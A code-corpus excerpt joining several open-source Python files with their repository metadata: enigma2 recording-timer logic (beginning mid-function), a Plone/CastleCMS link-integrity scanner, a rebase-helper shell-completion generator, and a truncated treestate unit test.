filename += " - " + self.name + " - " + self.description
else:
filename += " - " + self.name # standard
if config.recording.ascii_filenames.value:
filename = ASCIItranslit.legacyEncode(filename)
if not self.dirname:
dirname = findSafeRecordPath(defaultMoviePath())
else:
dirname = findSafeRecordPath(self.dirname)
if dirname is None:
dirname = findSafeRecordPath(defaultMoviePath())
self.dirnameHadToFallback = True
if not dirname:
return None
self.Filename = Directories.getRecordingFilename(filename, dirname)
self.log(0, "Filename calculated as: '%s'" % self.Filename)
return self.Filename
def tryPrepare(self):
if self.justplay:
return True
else:
if not self.calculateFilename():
self.do_backoff()
self.start_prepare = time() + self.backoff
return False
rec_ref = self.service_ref and self.service_ref.ref
if rec_ref and rec_ref.flags & eServiceReference.isGroup:
rec_ref = getBestPlayableServiceReference(rec_ref, eServiceReference())
if not rec_ref:
self.log(1, "'get best playable service for group... record' failed")
return False
self.record_service = rec_ref and NavigationInstance.instance.recordService(rec_ref)
if not self.record_service:
self.log(1, "'record service' failed")
return False
if self.repeated:
epgcache = eEPGCache.getInstance()
queryTime=self.begin+(self.end-self.begin)/2
evt = epgcache.lookupEventTime(rec_ref, queryTime)
if evt:
self.description = evt.getShortDescription()
if self.description == "":
self.description = evt.getExtendedDescription()
event_id = evt.getEventId()
else:
event_id = -1
else:
event_id = self.eit
if event_id is None:
event_id = -1
prep_res=self.record_service.prepare(self.Filename + ".ts", self.begin, self.end, event_id, self.name.replace("\n", ""), self.description.replace("\n", ""), ' '.join(self.tags), self.descramble, self.record_ecm)
if prep_res:
if prep_res == -255:
self.log(4, "failed to write meta information")
else:
self.log(2, "'prepare' failed: error %d" % prep_res)
# we must calc nur start time before stopRecordService call because in Screens/Standby.py TryQuitMainloop tries to get
# the next start time in evEnd event handler...
self.do_backoff()
self.start_prepare = time() + self.backoff
NavigationInstance.instance.stopRecordService(self.record_service)
self.record_service = None
return False
return True
def do_backoff(self):
if self.backoff == 0:
self.backoff = 5
else:
self.backoff *= 2
if self.backoff > 100:
self.backoff = 100
self.log(10, "backoff: retry in %d seconds" % self.backoff)
def activate(self):
next_state = self.state + 1
self.log(5, "activating state %d" % next_state)
if next_state == 1:
if self.always_zap:
if Screens.Standby.inStandby:
self.log(5, "wakeup and zap to recording service")
RecordTimerEntry.setWasInStandby()
#set service to zap after standby
Screens.Standby.inStandby.prev_running_service = self.service_ref.ref
Screens.Standby.inStandby.paused_service = None
#wakeup standby
Screens.Standby.inStandby.Power()
else:
if RecordTimerEntry.wasInDeepStandby:
RecordTimerEntry.setWasInStandby()
cur_zap_ref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if cur_zap_ref and not cur_zap_ref.getPath():# we do not zap away if it is no live service
Notifications.AddNotification(MessageBox, _("In order to record a timer, the TV was switched to the recording service!\n"), type=MessageBox.TYPE_INFO, timeout=20)
self.failureCB(True)
self.log(5, "zap to recording service")
if next_state == self.StatePrepared:
if self.tryPrepare():
self.log(6, "prepare ok, waiting for begin")
# create file to "reserve" the filename
# because another recording at the same time on another service can try to record the same event
# i.e. cable / sat.. then the second recording needs an own extension... when we create the file
# here than calculateFilename is happy
if not self.justplay:
open(self.Filename + ".ts", "w").close()
# Give the Trashcan a chance to clean up
try:
Trashcan.instance.cleanIfIdle(self.Filename)
except Exception, e:
print "[TIMER] Failed to call Trashcan.instance.cleanIfIdle()"
print "[TIMER] Error:", e
# fine. it worked, resources are allocated.
self.next_activation = self.begin
self.backoff = 0
return True
self.log(7, "prepare failed")
if self.first_try_prepare:
self.first_try_prepare = False
cur_ref = NavigationInstance.instance.getCurrentlyPlayingServiceReference()
if cur_ref and not cur_ref.getPath():
if Screens.Standby.inStandby:
self.failureCB(True)
elif not config.recording.asktozap.value:
self.log(8, "asking user to zap away")
Notifications.AddNotificationWithCallback(self.failureCB, MessageBox, _("A timer failed to record!\nDisable TV and try again?\n"), timeout=20, default=True)
else: # zap without asking
self.log(9, "zap without asking")
Notifications.AddNotification(MessageBox, _("In order to record a timer, the TV was switched to the recording service!\n"), type=MessageBox.TYPE_INFO, timeout=20)
self.failureCB(True)
elif cur_ref:
self.log(8, "currently running service is not a live service.. so stop it makes no sense")
else:
self.log(8, "currently no service running... so we dont need to stop it")
return False
elif next_state == self.StateRunning:
# if this timer has been cancelled, just go to "end" state.
if self.cancelled:
return True
if self.justplay:
if Screens.Standby.inStandby:
self.log(11, "wakeup and zap")
RecordTimerEntry.setWasInStandby()
#set service to zap after standby
Screens.Standby.inStandby.prev_running_service = self.service_ref.ref
Screens.Standby.inStandby.paused_service = None
#wakeup standby
Screens.Standby.inStandby.Power()
else:
if RecordTimerEntry.wasInDeepStandby:
RecordTimerEntry.setWasInStandby()
self.log(11, "zapping")
NavigationInstance.instance.playService(self.service_ref.ref)
return True
else:
self.log(11, "start recording")
if RecordTimerEntry.wasInDeepStandby:
RecordTimerEntry.keypress()
if Screens.Standby.inStandby: #In case some plugin did put the receiver already in standby
config.misc.standbyCounter.value = 0
else:
Notifications.AddNotification(Screens.Standby.Standby, StandbyCounterIncrease=False)
record_res = self.record_service.start()
if record_res:
self.log(13, "start record returned %d" % record_res)
self.do_backoff()
# retry
self.begin = time() + self.backoff
return False
# Tell the trashcan we started recording. The trashcan gets events,
# but cannot tell what the associated path is.
Trashcan.instance.markDirty(self.Filename)
return True
elif next_state == self.StateEnded:
old_end = self.end
if self.setAutoincreaseEnd():
self.log(12, "autoincrase recording %d minute(s)" % int((self.end - old_end)/60))
self.state -= 1
return True
self.log(12, "stop recording")
if not self.justplay:
NavigationInstance.instance.stopRecordService(self.record_service)
self.record_service = None
if not chechForRecordings():
if self.afterEvent == AFTEREVENT.DEEPSTANDBY or self.afterEvent == AFTEREVENT.AUTO and (Screens.Standby.inStandby or RecordTimerEntry.wasInStandby) and not config.misc.standbyCounter.value:
if not Screens.Standby.inTryQuitMainloop:
if Screens.Standby.inStandby:
RecordTimerEntry.TryQuitMainloop()
else:
Notifications.AddNotificationWithCallback(self.sendTryQuitMainloopNotification, MessageBox, _("A finished record timer wants to shut down\nyour receiver. Shutdown now?"), timeout=20, default=True)
elif self.afterEvent == AFTEREVENT.STANDBY or self.afterEvent == AFTEREVENT.AUTO and RecordTimerEntry.wasInStandby:
if not Screens.Standby.inStandby:
Notifications.AddNotificationWithCallback(self.sendStandbyNotification, MessageBox, _("A finished record timer wants to set your\nreceiver to standby. Do that now?"), timeout=20, default=True)
else:
RecordTimerEntry.keypress()
return True
def setAutoincreaseEnd(self, entry = None):
if not self.autoincrease:
return False
if entry is None:
new_end = int(time()) + self.autoincreasetime
else:
new_end = entry.begin - 30
dummyentry = RecordTimerEntry(self.service_ref, self.begin, new_end, self.name, self.description, self.eit, disabled=True, justplay = self.justplay, afterEvent = self.afterEvent, dirname = self.dirname, tags = self.tags)
dummyentry.disabled = self.disabled
timersanitycheck = TimerSanityCheck(NavigationInstance.instance.RecordTimer.timer_list, dummyentry)
if not timersanitycheck.check():
simulTimerList = timersanitycheck.getSimulTimerList()
if simulTimerList is not None and len(simulTimerList) > 1:
new_end = simulTimerList[1].begin
new_end -= 30 # 30 Sekunden Prepare-Zeit lassen
if new_end <= time():
return False
self.end = new_end
return True
def sendStandbyNotification(self, answer):
RecordTimerEntry.keypress()
if answer:
Notifications.AddNotification(Screens.Standby.Standby)
def sendTryQuitMainloopNotification(self, answer):
RecordTimerEntry.keypress()
if answer:
Notifications.AddNotification(Screens.Standby.TryQuitMainloop, 1)
def getNextActivation(self):
if self.state == self.StateEnded:
return self.end
next_state = self.state + 1
return {self.StatePrepared: self.start_prepare,
self.StateRunning: self.begin,
self.StateEnded: self.end }[next_state]
def failureCB(self, answer):
if answer == True:
self.log(13, "ok, zapped away")
#NavigationInstance.instance.stopUserServices()
NavigationInstance.instance.playService(self.service_ref.ref)
else:
self.log(14, "user didn't want to zap away, record will probably fail")
def timeChanged(self):
old_prepare = self.start_prepare
self.start_prepare = self.begin - self.prepare_time
self.backoff = 0
if int(old_prepare) != int(self.start_prepare):
self.log(15, "record time changed, start prepare is now: %s" % ctime(self.start_prepare))
def gotRecordEvent(self, record, event):
# TODO: this is not working (never true), please fix. (comparing two swig wrapped ePtrs)
if self.__record_service.__deref__() != record.__deref__():
return
self.log(16, "record event %d" % event)
if event == iRecordableService.evRecordWriteError:
print "WRITE ERROR on recording, disk full?"
# show notification. the 'id' will make sure that it will be
# displayed only once, even if more timers are failing at the
# same time. (which is very likely in case of disk fullness)
Notifications.AddPopup(text = _("Write error while recording. Disk full?\n"), type = MessageBox.TYPE_ERROR, timeout = 0, id = "DiskFullMessage")
# ok, the recording has been stopped. we need to properly note
# that in our state, with also keeping the possibility to re-try.
# TODO: this has to be done.
elif event == iRecordableService.evStart:
text = _("A record has been started:\n%s") % self.name
notify = config.usage.show_message_when_recording_starts.value and not Screens.Standby.inStandby
if self.dirnameHadToFallback:
text = '\n'.join((text, _("Please note that the previously selected media could not be accessed and therefore the default directory is being used instead.")))
notify = True
if notify:
Notifications.AddPopup(text = text, type = MessageBox.TYPE_INFO, timeout = 3)
elif event == iRecordableService.evRecordAborted:
NavigationInstance.instance.RecordTimer.removeEntry(self)
# we have record_service as property to automatically subscribe to record service events
def setRecordService(self, service):
if self.__record_service is not None:
print "[remove callback]"
NavigationInstance.instance.record_event.remove(self.gotRecordEvent)
self.__record_service = service
if self.__record_service is not None:
print "[add callback]"
NavigationInstance.instance.record_event.append(self.gotRecordEvent)
record_service = property(lambda self: self.__record_service, setRecordService)
def createTimer(xml):
begin = int(xml.get("begin"))
end = int(xml.get("end"))
serviceref = ServiceReference(xml.get("serviceref").encode("utf-8"))
description = xml.get("description").encode("utf-8")
repeated = xml.get("repeated").encode("utf-8")
disabled = long(xml.get("disabled") or "0")
justplay = long(xml.get("justplay") or "0")
always_zap = long(xml.get("always_zap") or "0")
afterevent = str(xml.get("afterevent") or "nothing")
afterevent = {
"nothing": AFTEREVENT.NONE,
"standby": AFTEREVENT.STANDBY,
"deepstandby": AFTEREVENT.DEEPSTANDBY,
"auto": AFTEREVENT.AUTO
}[afterevent]
eit = xml.get("eit")
if eit and eit != "None":
eit = long(eit);
else:
eit = None
location = xml.get("location")
if location and location != "None":
location = location.encode("utf-8")
else:
location = None
tags = xml.get("tags")
if tags and tags != "None":
tags = tags.encode("utf-8").split(' ')
else:
tags = None
descramble = int(xml.get("descramble") or "1")
record_ecm = int(xml.get("record_ecm") or "0")
name = xml.get("name").encode("utf-8")
#filename = xml.get("filename").encode("utf-8")
entry = RecordTimerEntry(serviceref, begin, end, name, description, eit, disabled, justplay, afterevent, dirname = location, tags = tags, descramble = descramble, record_ecm = record_ecm, always_zap = always_zap)
entry.repeated = int(repeated)
for l in xml.findall("log"):
time = int(l.get("time"))
code = int(l.get("code"))
msg = l.text.strip().encode("utf-8")
entry.log_entries.append((time, code, msg))
return entry
class RecordTimer(timer.Timer):
def __init__(self):
timer.Timer.__init__(self)
self.Filename = Directories.resolveFilename(Directories.SCOPE_CONFIG, "timers.xml")
try:
self.loadTimer()
except IOError:
print "unable to load timers from file!"
def doActivate(self, w):
# when activating a timer which has already passed,
# simply abort the timer. don't run trough all the stages.
if w.shouldSkip():
w.state = RecordTimerEntry.StateEnded
else:
# when active returns true, this means "accepted".
# otherwise, the current state is kept.
# the timer entry itself will fix up the delay then.
if w.activate():
w.state += 1
self.timer_list.remove(w)
# did this timer reached the last state?
if w.state < RecordTimerEntry.StateEnded:
# no, sort it into active list
insort(self.timer_list, w)
else:
# yes. Process repeated, and re-add.
if w.repeated:
w.processRepeated()
w.state = RecordTimerEntry.StateWaiting
w.first_try_prepare = True
self.addTimerEntry(w)
else:
# Remove old timers as set in config
self.cleanupDaily(config.recording.keep_timers.value)
insort(self.processed_timers, w)
self.stateChanged(w)
def isRecording(self):
for timer in self.timer_list:
if timer.isRunning() and not timer.justplay:
return True
return False
def loadTimer(self):
# TODO: PATH!
if not Directories.fileExists(self.Filename):
return
try:
doc = xml.etree.cElementTree.parse(self.Filename)
except SyntaxError:
from Tools.Notifications import AddPopup
from Screens.MessageBox import MessageBox
AddPopup(_("The timer file (timers.xml) is corrupt and could not be loaded."), type = MessageBox.TYPE_ERROR, timeout = 0, id = "TimerLoadFailed")
print "timers.xml failed to load!"
try:
import os
os.rename(self.Filename, self.Filename + "_old")
except (IOError, OSError):
print "renaming broken timer failed"
return
except IOError:
print "timers.xml not found!"
return
root = doc.getroot()
# put out a message when at least one timer overlaps
checkit = True
for timer in root.findall("timer"):
newTimer = createTimer(timer)
if (self.record(newTimer, True, dosave=False) is not None) and (checkit == True):
from Tools.Notifications import AddPopup
from Screens.MessageBox import MessageBox
AddPopup(_("Timer overlap in timers.xml detected!\nPlease recheck it!"), type = MessageBox.TYPE_ERROR, timeout = 0, id = "TimerLoadFailed")
checkit = False # at moment it is enough when the message is displayed one time
def saveTimer(self):
#root_element = xml.etree.cElementTree.Element('timers')
#root_element.text = "\n"
#for timer in self.timer_list + self.processed_timers:
# some timers (instant records) don't want to be saved.
# skip them
#if timer.dontSave:
#continue
#t = xml.etree.cElementTree.SubElement(root_element, 'timers')
#t.set("begin", str(int(timer.begin)))
#t.set("end", str(int(timer.end)))
#t.set("serviceref", str(timer.service_ref))
#t.set("repeated", str(timer.repeated))
#t.set("name", timer.name)
#t.set("description", timer.description)
#t.set("afterevent", str({
# AFTEREVENT.NONE: "nothing",
# AFTEREVENT.STANDBY: "standby",
# AFTEREVENT.DEEPSTANDBY: "deepstandby",
# AFTEREVENT.AUTO: "auto"}))
#if timer.eit is not None:
# t.set("eit", str(timer.eit))
#if timer.dirname is not None:
# t.set("location", str(timer.dirname))
#t.set("disabled", str(int(timer.disabled)))
#t.set("justplay", str(int(timer.justplay)))
#t.text = "\n"
#t.tail = "\n"
#for time, code, msg in timer.log_entries:
#l = xml.etree.cElementTree.SubElement(t, 'log')
#l.set("time", str(time))
#l.set("code", str(code))
#l.text = str(msg)
#l.tail = "\n"
#doc = xml.etree.cElementTree.ElementTree(root_element)
#doc.write(self.Filename)
list = []
list.append('<?xml version="1.0" ?>\n')
list.append('<timers>\n')
for timer in self.timer_list + self.processed_timers:
if timer.dontSave:
continue
list.append('<timer')
list.append(' begin="' + str(int(timer.begin)) + '"')
list.append(' end="' + str(int(timer.end)) + '"')
list.append(' serviceref="' + stringToXML(str(timer.service_ref)) + '"')
list.append(' repeated="' + str(int(timer.repeated)) + '"')
list.append(' name="' + str(stringToXML(timer.name)) + '"')
list.append(' description="' + str(stringToXML(timer.description)) + '"')
list.append(' afterevent="' + str(stringToXML({
AFTEREVENT.NONE: "nothing",
AFTEREVENT.STANDBY: "standby",
AFTEREVENT.DEEPSTANDBY: "deepstandby",
AFTEREVENT.AUTO: "auto"
}[timer.afterEvent])) + '"')
if timer.eit is not None:
list.append(' eit="' + str(timer.eit) + '"')
if timer.dirname is not None:
list.append(' location="' + str(stringToXML(timer.dirname)) + '"')
if timer.tags is not None:
list.append(' tags="' + str(stringToXML(' '.join(timer.tags))) + '"')
list.append(' disabled="' + str(int(timer.disabled)) + '"')
list.append(' justplay="' + str(int(timer.justplay)) + '"')
list.append(' always_zap="' + str(int(timer.always_zap)) + '"')
list.append(' descramble="' + str(int(timer.descramble)) + '"')
list.append(' record_ecm="' + str(int(timer.record_ecm)) + '"')
list.append('>\n')
if config.recording.debug.value:
for time, code, msg in timer.log_entries:
list.append('<log')
list.append(' code="' + str(code) + '"')
list.append(' time="' + str(time) + '"')
list.append('>')
list.append(str(stringToXML(msg)))
list.append('</log>\n')
list.append('</timer>\n')
list.append('</timers>\n')
file = open(self.Filename + ".writing", "w")
for x in list:
file.write(x)
file.flush()
import os
os.fsync(file.fileno())
file.close()
os.rename(self.Filename + ".writing", self.Filename)
def getNextZapTime(self):
now = time()
for timer in self.timer_list:
if not timer.justplay or timer.begin < now:
continue
return timer.begin
return -1
def getNextRecordingTime(self):
now = time()
for timer in self.timer_list:
next_act = timer.getNextActivation()
if timer.justplay or next_act < now:
continue
return next_act
return -1
def getNextTimerTime(self):
now = time()
for timer in self.timer_list:
next_act = timer.getNextActivation()
if next_act < now:
continue
return next_act
return -1
def isNextRecordAfterEventActionAuto(self):
now = time()
t = None
for timer in self.timer_list:
if timer.justplay or timer.begin < now:
continue
if t is None or t.begin == timer.begin:
t = timer
if t.afterEvent == AFTEREVENT.AUTO:
return True
return False
def record(self, entry, ignoreTSC=False, dosave=True): #wird von loadTimer mit dosave=False aufgerufen
timersanitycheck = TimerSanityCheck(self.timer_list,entry)
if not timersanitycheck.check():
if ignoreTSC != True:
print "timer conflict detected!"
print timersanitycheck.getSimulTimerList()
return timersanitycheck.getSimulTimerList()
else:
print "ignore timer conflict"
elif timersanitycheck.doubleCheck():
print "ignore double timer"
return None
entry.timeChanged()
print "[Timer] Record " + str(entry)
entry.Timer = self
self.addTimerEntry(entry)
if dosave:
self.saveTimer()
return None
def isInTimer(self, eventid, begin, duration, service):
returnValue = None
type = 0
time_match = 0
bt = None
end = begin + duration
refstr = str(service)
for x in self.timer_list:
check = x.service_ref.ref.toString() == refstr
if not check:
sref = x.service_ref.ref
parent_sid = sref.getUnsignedData(5)
parent_tsid = sref.getUnsignedData(6)
if parent_sid and parent_tsid: # check for subservice
sid = sref.getUnsignedData(1)
tsid = sref.getUnsignedData(2)
sref.setUnsignedData(1, parent_sid)
sref.setUnsignedData(2, parent_tsid)
sref.setUnsignedData(5, 0)
sref.setUnsignedData(6, 0)
check = sref.toCompareString() == refstr
num = 0
if check:
check = False
event = eEPGCache.getInstance().lookupEventId(sref, eventid)
num = event and event.getNumOfLinkageServices() or 0
sref.setUnsignedData(1, sid)
sref.setUnsignedData(2, tsid)
sref.setUnsignedData(5, parent_sid)
sref.setUnsignedData(6, parent_tsid)
for cnt in range(num):
subservice = event.getLinkageService(sref, cnt)
if sref.toCompareString() == subservice.toCompareString():
check = True
break
if check:
timer_end = x.end
type_offset = 0
if x.justplay:
type_offset = 5
if (timer_end - x.begin) <= 1:
timer_end += 60
if x.always_zap:
type_offset = 10
if x.repeated != 0:
if bt is None:
bt = localtime(begin)
et = localtime(end)
bday = bt.tm_wday;
begin2 = bday * 1440 + bt.tm_hour * 60 + bt.tm_min
end2 = et.tm_wday * 1440 + et.tm_hour * 60 + et.tm_min
if x.repeated & (1 << bday):
xbt = localtime(x.begin)
xet = localtime(timer_end)
xbegin = bday * 1440 + xbt.tm_hour * 60 + xbt.tm_min
xend = bday * 1440 + xet.tm_hour * 60 + xet.tm_min
if xend < xbegin:
xend += 1440
if begin2 < xbegin <= end2:
if xend < end2: # recording within event
time_match = (xend - xbegin) * 60
type = type_offset + 3
else: # recording last part of event
time_match = (end2 - xbegin) * 60
type = type_offset + 1
elif xbegin <= begin2 <= xend:
if xend < end2: # recording first part of event
time_match = (xend - begin2) * 60
type = type_offset + 4
else: # recording whole event
time_match = (end2 - begin2) * 60
type = type_offset + 2
else:
if begin < x.begin <= end:
if timer_end < end: # recording within event
time_match = timer_end - x.begin
type = type_offset + 3
else: # recording last part of event
time_match = end - x.begin
type = type_offset + 1
elif x.begin <= begin <= timer_end:
if timer_end < end: # recording first part of event
time_match = timer_end - begin
type = type_offset + 4
else: # recording whole event
time_match = end - begin
type = type_offset + 2
if time_match:
if type in (2,7,12): # When full recording do not look further
returnValue = (time_match, [type])
break
elif returnValue:
if type not in returnValue[1]:
returnValue[1].append(type)
else:
returnValue = (time_match, [type])
return returnValue
def removeEntry(self, entry):
print "[Timer] Remove " + str(entry)
# avoid re-enqueuing
entry.repeated = False
# abort timer.
# this sets the end time to current time, so timer will be stopped.
entry.autoincrease = False
entry.abort()
if entry.state != entry.StateEnded:
self.timeChanged(entry)
print "state: ", entry.state
print "in processed: ", entry in self.processed_timers
print "in running: ", entry in self.timer_list
# autoincrease instanttimer if possible
if not entry.dontSave:
for x in self.timer_list:
if x.setAutoincreaseEnd():
self.timeChanged(x)
# now the timer should be in the processed_timers list. remove it from there.
self.processed_timers.remove(entry)
self.saveTimer()
def shutdown(self):
self.saveTimer()
|
pli3/enigma2-pli
|
RecordTimer.py
|
Python
|
gpl-2.0
| 32,081
|
from castle.cms.interfaces import IReferenceNamedImage
from plone.app.uuid.utils import uuidToObject
from persistent.mapping import PersistentMapping
from persistent.dict import PersistentDict
from lxml.html import fromstring
from lxml.html import tostring
from plone import api
from plone.app.blocks.layoutbehavior import ILayoutAware
from plone.app.linkintegrity import handlers as li
from plone.app.linkintegrity.parser import extractLinks
from plone.tiles.data import ANNOTATIONS_KEY_PREFIX
from z3c.relationfield import RelationValue
from zope.annotation.interfaces import IAnnotations
from zope.component import getUtility
from zope.intid.interfaces import IIntIds
from zope.keyreference.interfaces import NotYet
def scan(obj):
""" a dexterity based object was modified """
if not li.check_linkintegrity_dependencies(obj):
return
refs = get_content_links(obj)
li.updateReferences(obj, refs)
def get_ref(obj, intids=None):
if intids is None:
intids = getUtility(IIntIds)
try:
objid = intids.getId(obj)
except KeyError:
try:
intids.register(obj)
objid = intids.getId(obj)
except NotYet:
# if we get a NotYet error, the object is not
# attached yet and we will need to get links
# at a later time when the object has an intid
pass
return objid
def get_content_links(obj):
refs = set()
if ILayoutAware.providedBy(obj):
behavior_data = ILayoutAware(obj)
# get data from tile data
annotations = IAnnotations(obj)
for key in annotations.keys():
if key.startswith(ANNOTATIONS_KEY_PREFIX):
data = annotations[key]
refs |= get_tile_data_links(obj, data)
if not behavior_data.contentLayout and behavior_data.content:
dom = fromstring(behavior_data.content)
for el in dom.cssselect('.mosaic-text-tile .mosaic-tile-content'):
links = extractLinks(tostring(el))
refs |= li.getObjectsFromLinks(obj, links)
try:
# scan more than just this we probably should...
value = obj.text.raw
links = extractLinks(value)
refs |= li.getObjectsFromLinks(obj, links)
except AttributeError:
pass
if getattr(obj, 'image', None):
if IReferenceNamedImage.providedBy(obj.image):
sub_obj = uuidToObject(obj.image.reference)
if sub_obj:
objid = get_ref(obj)
if objid:
refs.add(RelationValue(objid))
return refs
def get_tile_data_links(obj, data):
refs = set()
if type(data) in (dict, PersistentMapping, PersistentDict):
for field_name in ('content', 'video', 'image', 'images', 'audio'):
if field_name not in data:
continue
val = data.get(field_name)
if isinstance(val, basestring):
links = extractLinks(val)
refs |= li.getObjectsFromLinks(obj, links)
elif isinstance(val, list):
# could be list of uids
refs |= get_refs_from_uids(val)
return refs
def get_refs_from_uids(uids):
intids = getUtility(IIntIds)
objects = set()
catalog = api.portal.get_tool('portal_catalog')
for brain in catalog(UID=uids):
obj = brain.getObject()
objid = get_ref(obj, intids)
if objid:
relation = RelationValue(objid)
objects.add(relation)
return objects
|
castlecms/castle.cms
|
castle/cms/linkintegrity.py
|
Python
|
gpl-2.0
| 3,563
|
# -*- coding: utf-8 -*-
#
# This tool helps you to rebase package to the latest version
# Copyright (C) 2013-2014 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hracek <phracek@redhat.com>
# Tomas Hozza <thozza@redhat.com>
import re
import sys
from rebasehelper.cli import CLI
from rebasehelper.archive import Archive
class Completion(object):
@staticmethod
def extensions():
archives = Archive.get_supported_archives()
return [a.lstrip('.') for a in archives]
@staticmethod
def options():
def get_delimiter(parser, action):
if action.nargs == 0:
return None
fmt = parser._get_formatter() # pylint: disable=protected-access
usage = fmt._format_actions_usage([action], []) # pylint: disable=protected-access
option_string = action.option_strings[0]
idx = usage.find(option_string)
if idx == -1:
return None
return usage[idx + len(option_string)]
parser = CLI.build_parser()
result = []
actions = parser._get_optional_actions() + parser._get_positional_actions() # pylint: disable=protected-access
for action in actions:
if not action.option_strings:
continue
delimiter = get_delimiter(parser, action) or ''
result.append(dict(
options=[o + delimiter.strip() for o in action.option_strings],
choices=action.choices or []))
return result
@classmethod
def dump(cls):
options = cls.options()
return {
# pattern list of extensions
'RH_EXTENSIONS': '@({})'.format('|'.join(cls.extensions())),
# array of options
'RH_OPTIONS': '({})'.format(' '.join(['"{}"'.format(' '.join(o['options'])) for o in options])),
# array of choices of respective options
'RH_CHOICES': '({})'.format(' '.join(['"{}"'.format(' '.join(o['choices'])) for o in options])),
}
def replace_placeholders(s, **kwargs):
placeholder_re = re.compile(r'@(\w+)@')
matches = list(placeholder_re.finditer(s))
result = s
for match in reversed(matches):
replacement = kwargs.get(match.group(1), '')
result = result[:match.start(0)] + replacement + result[match.end(0):]
return result
def main():
if len(sys.argv) != 3:
return 1
with open(sys.argv[1]) as f:
s = f.read()
s = replace_placeholders(s, **Completion.dump())
with open(sys.argv[2], 'w') as f:
f.write(s)
return 0
if __name__ == '__main__':
main()
|
phracek/rebase-helper
|
rebasehelper/completion.py
|
Python
|
gpl-2.0
| 3,343
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
from __future__ import absolute_import
import itertools
import os
import posixpath
import random
import tempfile
import unittest
import silenttestrunner
from bindings import treestate
from edenscm.mercurial import pycompat
from hghave import require
testtmp = os.getenv("TESTTMP") or tempfile.mkdtemp("test-treestate")
def randname():
length = random.randint(1, 4)
return "".join(random.sample("abcdef", 1)[0] for i in range(length))
def randpath(path=""):
# pop components from path
for i in range(1 + random.randrange(path.count("/") + 1)):
path = os.path.dirname(path)
# push new components to path
maxlevel = 4
for i in range(1 + random.randrange(max([1, maxlevel - path.count("/")]))):
path = posixpath.join(path, randname())
if not path:
path = randname()
return path
def genpaths():
"""generate random paths"""
path = ""
while True:
nextpath = randpath(path)
yield nextpath
path = nextpath
def genfiles():
"""generate random tuple of (path, bits, mode, size, mtime, copied)"""
pathgen = genpaths()
while True:
path = next(pathgen)
bits = 0
mode = random.randint(0, 0o777)
size = random.randint(0, 1 << 31)
mtime = random.randint(-1, 1 << 31)
copied = None
# bits (StateFlags)
for bit in [
treestate.EXIST_P1,
treestate.EXIST_P2,
treestate.EXIST_NEXT,
treestate.IGNORED,
treestate.NEED_CHECK,
]:
if random.randint(0, 1):
bits |= bit
if random.randint(0, 1):
bits |= treestate.COPIED
copied = next(pathgen)
yield (path, bits, mode, size, mtime, copied)
class testtreestate(unittest.TestCase):
def testempty(self):
tree = treestate.treestate(os.path.join(testtmp, "empty"), 0)
self.assertEqual(len(tree), 0)
self.assertEqual(tree.getmetadata(), b"")
self.assertEqual(tree.walk(0, 0), [])
self.assertTrue(tree.hasdir("/"))
for path in ["", "a", "/", "b/c", "d/"]:
self.assertFalse(path in tree)
if path and path != "/":
self.assertFalse(tree.hasdir(path))
if path != "/":
if path.endswith("/"):
self.assertIsNone(tree.getdir(path))
else:
self.assertIsNone(tree.get(path, None))
def testinsert(self):
tree = treestate.treestate(os.path.join(testtmp, "insert"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testremove(self):
tree = treestate.treestate(os.path.join(testtmp, "remove"), 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
if (mtime & 1) == 0:
tree.remove(path)
if path in expected:
del expected[path]
else:
expected[path] = (bits, mode, size, mtime, copied)
self.assertEqual(len(tree), len(expected))
for path in tree.walk(0, 0):
self.assertTrue(tree.hasdir(os.path.dirname(path) + "/"))
self.assertEqual(tree.get(path, None), expected[path])
def testwalk(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
count = 5000
files = list(itertools.islice(genfiles(), count))
expected = {}
for path, bits, mode, size, mtime, copied in files:
tree.insert(path, bits, mode, size, mtime, copied)
expected[path] = (bits, mode, size, mtime, copied)
def walk(setbits, unsetbits):
return sorted(
k
for k, v in pycompat.iteritems(expected)
if ((v[0] & unsetbits) == 0 and (v[0] & setbits) == setbits)
)
def check(setbits, unsetbits):
self.assertEqual(
walk(setbits, unsetbits), sorted(tree.walk(setbits, unsetbits))
)
for i in ["in-memory", "flushed"]:
for bit in [treestate.IGNORED, treestate.COPIED]:
check(0, bit)
check(bit, 0)
check(treestate.EXIST_P1, treestate.EXIST_P2)
rootid = tree.flush()
tree = treestate.treestate(treepath, rootid)
def testdirfilter(self):
treepath = os.path.join(testtmp, "walk")
tree = treestate.treestate(treepath, 0)
files = ["a/b", "a/b/c", "b/c", "c/d"]
for path in files:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.walk(1, 0, None), files)
self.assertEqual(
tree.walk(1, 0, lambda dir: dir in {"a/b/", "c/"}), ["a/b", "b/c"]
)
self.assertEqual(tree.walk(1, 0, lambda dir: True), [])
def testflush(self):
treepath = os.path.join(testtmp, "flush")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
rootid1 = tree.flush()
tree.remove("a")
tree.insert("b", 1, 2, 3, 4, None)
tree.setmetadata(b"2")
rootid2 = tree.flush()
tree = treestate.treestate(treepath, rootid1)
self.assertTrue("a" in tree)
self.assertFalse("b" in tree)
self.assertEqual(tree.getmetadata(), b"1")
tree = treestate.treestate(treepath, rootid2)
self.assertFalse("a" in tree)
